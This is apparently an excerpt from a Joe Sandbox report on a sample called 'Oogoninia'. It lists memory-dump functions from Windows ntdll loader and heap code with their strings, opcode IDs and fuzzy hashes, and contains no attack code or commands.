                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-1975516107
                                                                                                                                                                                    • Opcode ID: 81b180d7903ff1f1dac7f686e3a44e76b0cafef72a35b080c66cbae086c5f4f6
                                                                                                                                                                                    • Instruction ID: b45ed0c3e2594a6f08bf99433bff3dfe8db04144e099b54650abfeecfd3fff4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81b180d7903ff1f1dac7f686e3a44e76b0cafef72a35b080c66cbae086c5f4f6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F651F375A06345AFEB05CF64C494B9DFBB1BF88318F51445AD801AB281DBB4BA86CB90
                                                                                                                                                                                    Function 325CF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                    • API String ID: 0-2224505338
                                                                                                                                                                                    • Opcode ID: 350b044d483f89b02dbf55aaed49591e4f28d78678f56d23218ffca07d6e16b7
                                                                                                                                                                                    • Instruction ID: cb16ade40c648f3d299709d5adcbb9555732e4c6eb6b5ae130651ca1de81ef28
                                                                                                                                                                                    • Opcode Fuzzy Hash: 350b044d483f89b02dbf55aaed49591e4f28d78678f56d23218ffca07d6e16b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8651E436601254EFEB15DF94C884F5A77E4EF487A4F1188A7F401DB229DA71EB40CE11
                                                                                                                                                                                    Function 325A8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • VerifierDlls, xrefs: 325A893D
                                                                                                                                                                                    • HandleTraces, xrefs: 325A890F
                                                                                                                                                                                    • VerifierFlags, xrefs: 325A88D0
                                                                                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 325A880F
                                                                                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 325A86BD
                                                                                                                                                                                    • VerifierDebug, xrefs: 325A8925
                                                                                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 325A86E7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                    • API String ID: 0-3223716464
                                                                                                                                                                                    • Opcode ID: d29726ce16c81dcba471c1771d8f22ac3983c116f36657bd66a95a427a509c67
                                                                                                                                                                                    • Instruction ID: c752ebb57286d435c7f3318a0bbdba674c2bad96d22680185af92a2de52a453e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d29726ce16c81dcba471c1771d8f22ac3983c116f36657bd66a95a427a509c67
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50913472542352AFE316CF24D9A9B1EBB94AF88728F844C59F9406B340CB70BF45CB91
                                                                                                                                                                                    Function 3254237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 3258A7AF
                                                                                                                                                                                    • LdrpDynamicShimModule, xrefs: 3258A7A5
                                                                                                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3258A79F
                                                                                                                                                                                    • DGO2, xrefs: 32542382
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: DGO2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 0-4212057674
                                                                                                                                                                                    • Opcode ID: c4e0ce1b149723ced6904872dff10e7bd99943b4b78f4a1cf346a9e7d941a83e
                                                                                                                                                                                    • Instruction ID: a77513ffdf86bec5971f288e8a10c3c069b926ffb698a9ebdeec9109962bd3cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: c4e0ce1b149723ced6904872dff10e7bd99943b4b78f4a1cf346a9e7d941a83e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6310575A51240BFF7149F18C895A5EBBB4EFC8754F14445AE901E7240DAB07AC2CF90
                                                                                                                                                                                    Function 3251F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                    • API String ID: 0-523794902
                                                                                                                                                                                    • Opcode ID: 8119efa140e1f42a7c07aa9a55566f4267f0142c19d5a8f82c21809ff4549977
                                                                                                                                                                                    • Instruction ID: 573bc36cb57e503c54b5edb859dbfd3f452d40c3b65c69a92d1affbe21035c9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8119efa140e1f42a7c07aa9a55566f4267f0142c19d5a8f82c21809ff4549977
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4224752457819FEB05CF28C884B2ABBE5FF88348F44496DE885CB352DB74EA41CB52
                                                                                                                                                                                    Function 3254510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.T2
                                                                                                                                                                                    • API String ID: 0-2417481782
                                                                                                                                                                                    • Opcode ID: a1849e84d291ccd46703f2ecbe5668d848c256f93e4e043baa05e6b4c52b0011
                                                                                                                                                                                    • Instruction ID: cce16498ad9fc57942cb03f4bc24c08a17138a31908974fb606196c7e6178e60
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1849e84d291ccd46703f2ecbe5668d848c256f93e4e043baa05e6b4c52b0011
                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF12BB6D01219EFDB05CF94C940AEEBBBCEF58754F50446AE515E7210EEB49B01CBA0
                                                                                                                                                                                    Function 3253B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                    • API String ID: 0-122214566
                                                                                                                                                                                    • Opcode ID: ce599706f3d027fa69ff67153cc306a1c1e8a827de78d49ce9127b8c6d99da38
                                                                                                                                                                                    • Instruction ID: f8680f00e5e99900361903b7d8a59558564bb5be5d031e4e12c905cf921e05fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce599706f3d027fa69ff67153cc306a1c1e8a827de78d49ce9127b8c6d99da38
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7C12975B02359ABEB068B64C890BBE7B61EF85304F546169EE02DB290DFB4DF44C391
                                                                                                                                                                                    Function 3255631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 0-792281065
                                                                                                                                                                                    • Opcode ID: c8d2f1a198015ac8a123e956dfe6979107ac4a264ce3029db1fa107824137153
                                                                                                                                                                                    • Instruction ID: 99bc74efcbebd82f5401d6d18405dcfd7a7749a1ee255a9c9192084b475784f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8d2f1a198015ac8a123e956dfe6979107ac4a264ce3029db1fa107824137153
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7916A74A43395EBE715CF10C954BEE7BA0EF85794F50446AE911AB2C0CBB47B81CB90
                                                                                                                                                                                    Function 32549723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                    • API String ID: 3446177414-2283098728
                                                                                                                                                                                    • Opcode ID: a3f8c084f036b477fdd8182a62bfa74608d2437fb47fe67c852b283c0a79f5f5
                                                                                                                                                                                    • Instruction ID: 62426b8a1ffb4435c84b9a5d247e9c539e1a1b53409b6ed7d6345f38a0fda126
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3f8c084f036b477fdd8182a62bfa74608d2437fb47fe67c852b283c0a79f5f5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21512475609701ABE715DF38C886F19FBA0BFC9324F540A6DE95197281DFB0BA41CB82
                                                                                                                                                                                    Function 3255C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 325980E2
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 325980F3
                                                                                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 325980E9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-1783798831
                                                                                                                                                                                    • Opcode ID: f74dc31b651850719d29697a569563f6cedcb20d392742d6ce34668a1765e5de
                                                                                                                                                                                    • Instruction ID: 636afdf1c7ab49bd6ad6ab56caac2db5a8ffccfd1c50fc0714d7f1860f4dd81d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f74dc31b651850719d29697a569563f6cedcb20d392742d6ce34668a1765e5de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B4102B9552300ABD711DF28DC40B5F7BE8AF88750F50582BB949E7250EB70FA85CB92
                                                                                                                                                                                    Function 325A43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • LdrpCheckRedirection, xrefs: 325A450F
                                                                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 325A4519
                                                                                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 325A4508
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                    • API String ID: 3446177414-3154609507
                                                                                                                                                                                    • Opcode ID: d702bcb0aa80ef42643d179180c38188154640df961420301c3537f879e4171c
                                                                                                                                                                                    • Instruction ID: 38e932ba5a4c2e47a0208ec88538e5df106688f1e970491a50812039ece1c5fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: d702bcb0aa80ef42643d179180c38188154640df961420301c3537f879e4171c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F04113766053119FDB12CFD8C861A1E7BE4AF88756F050A5AEC98D7311DB31EE40CB91
                                                                                                                                                                                    Function 325FACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: f13f53c820eed97cb05aaeea0161ea436deb1d777517c5d0d14852949364d55d
                                                                                                                                                                                    • Instruction ID: 58cd7f3580c682ae907704193622a02c1b8e75e03f804f5dfc6634b55be21120
                                                                                                                                                                                    • Opcode Fuzzy Hash: f13f53c820eed97cb05aaeea0161ea436deb1d777517c5d0d14852949364d55d
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F1E777E00615EFCB18CF68C99067EBFF5AF88240B59416DD856DB380EA35EA41CB50
                                                                                                                                                                                    Function 32517662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                    • API String ID: 0-3061284088
                                                                                                                                                                                    • Opcode ID: 2d129dfe5028489c52be4ed23cbedcf7a81ed2dbcac6c797aebe8ff2ad8feaeb
                                                                                                                                                                                    • Instruction ID: c29489a65ebb4ecb228871466c5d903de0f8d6605b5fb96fd2aa79e7bb2792ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d129dfe5028489c52be4ed23cbedcf7a81ed2dbcac6c797aebe8ff2ad8feaeb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D017B36145280BFF309832CE408F867BA4DFC6731F25488AE0004BA90CEABBB81D960
                                                                                                                                                                                    Function 32521380 Relevance: 5.4, Strings: 4, Instructions: 385COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                    • API String ID: 0-2084224854
                                                                                                                                                                                    • Opcode ID: 92df14dd901cec037e0749b7fbd5a8eef2c14429c36801127f9b85e90c3951a8
                                                                                                                                                                                    • Instruction ID: f832ef71eb61f7f68a767640389a8dbabca05cdf2b9dff000178ba360071e479
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92df14dd901cec037e0749b7fbd5a8eef2c14429c36801127f9b85e90c3951a8
                                                                                                                                                                                    • Instruction Fuzzy Hash: ABE1DF74A043459FEB18CF68C490B7BBBE5AF48714F54C859E896CB2C6EB34EA41CB50
                                                                                                                                                                                    Function 32520485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32520586
                                                                                                                                                                                    • kLsE, xrefs: 325205FE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                    • API String ID: 3446177414-2547482624
                                                                                                                                                                                    • Opcode ID: e56cb698694f4e884034f68933cde1d0d7f419cc1cabfcfd81a962cec7603edd
                                                                                                                                                                                    • Instruction ID: a32005b4e905cad8e5f9aa71504d47f82b27833e0fc434ea50bb036895de5e07
                                                                                                                                                                                    • Opcode Fuzzy Hash: e56cb698694f4e884034f68933cde1d0d7f419cc1cabfcfd81a962cec7603edd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C51A1B6A02745DFE714DFA4C4447AABBF8AF54304F00883ED595972C0EB74AB45CBA1
                                                                                                                                                                                    Function 3252A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                    • API String ID: 0-379654539
                                                                                                                                                                                    • Opcode ID: cf45ac179daf060b035290cefbf2dbfe843b10fea3adc948aa1367f7bfb0bf87
                                                                                                                                                                                    • Instruction ID: 7e020f3288e07433812853c5de64603db925bd0378dde274b4886a1c26940051
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf45ac179daf060b035290cefbf2dbfe843b10fea3adc948aa1367f7bfb0bf87
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5C17B74218382CFE715CF18C540B5ABBE4BF84744F40496AF995CB2D0EBB4CA49CB92
                                                                                                                                                                                    Function 32558322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3255847E
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 32558341
                                                                                                                                                                                    • LdrpInitializeProcess, xrefs: 32558342
                                                                                                                                                                                    • @, xrefs: 325584B1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 0-1918872054
                                                                                                                                                                                    • Opcode ID: 94e80f537561b12b6fb5dcaa46bf97acad02bd98ba054343b4208ddb8275ec57
                                                                                                                                                                                    • Instruction ID: af25583538e1ee17bb28dfd1759521e169160254bd771778c84e32845fc36d01
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94e80f537561b12b6fb5dcaa46bf97acad02bd98ba054343b4208ddb8275ec57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2918F71509345EFE321CE20D944FABBBECAF84788F80492EFA89D2150E775DA44CB52
                                                                                                                                                                                    Function 3255265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 32591FE8
                                                                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 325920C0
                                                                                                                                                                                    • .Local, xrefs: 325527F8
                                                                                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32591FE3, 325920BB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
